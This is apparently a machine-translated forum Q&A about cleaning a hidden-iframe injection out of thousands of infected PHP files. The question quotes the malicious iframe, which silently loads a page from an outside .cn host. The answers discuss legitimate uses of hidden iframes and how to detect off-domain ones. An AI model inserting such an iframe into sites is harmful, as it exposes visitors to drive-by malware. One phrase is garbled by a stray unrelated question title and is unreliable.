在PHP中隱藏iframe是否有任何合法用途？

Question

hidden iframe有沒有合法用途？我有Can a file be read and written right back with small changes without knowing its encoding in C#?的病毒，這些病毒都遍佈php文件（每個文件似乎只有一個條目，但無法確定5000個文件）。

我發現的人有這個，但我不能確定有其他人有一些不同的內部。我能否假設所有iframe哪裏知名度是hidden都是惡意？

<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>

或者，也許還有其他的方式，我可以告訴我的C＃代碼來看待它？我不想打破文件和網站，但我不能只是尋找確切的價值，因爲我可能會錯過一些東西。

Answer 1

隱藏的IFRAME當然可以用於惡意目的，但它可以合法使用。例如，您可以使用隱藏的IFRAME來模擬對服務器的異步調用（如果我記得，ASP.Net在一點上做到了這一點）。

我也使用IFRAMEs來解決文件上傳控制限制（隱藏和可見IFRAMEs可以用於此）。

可疑，但默認情況下不是惡意。

Answer 2

我見過的一些舊流量計數器使用隱藏的iFrame來計算流量，但這是關於隱藏iFrame的唯一合法用法;我當然不喜歡它，如果是我，我也會刪除它們。

你可以檢查的另一件事是，如果iFrame是隱藏的，並且源不是來自你的域。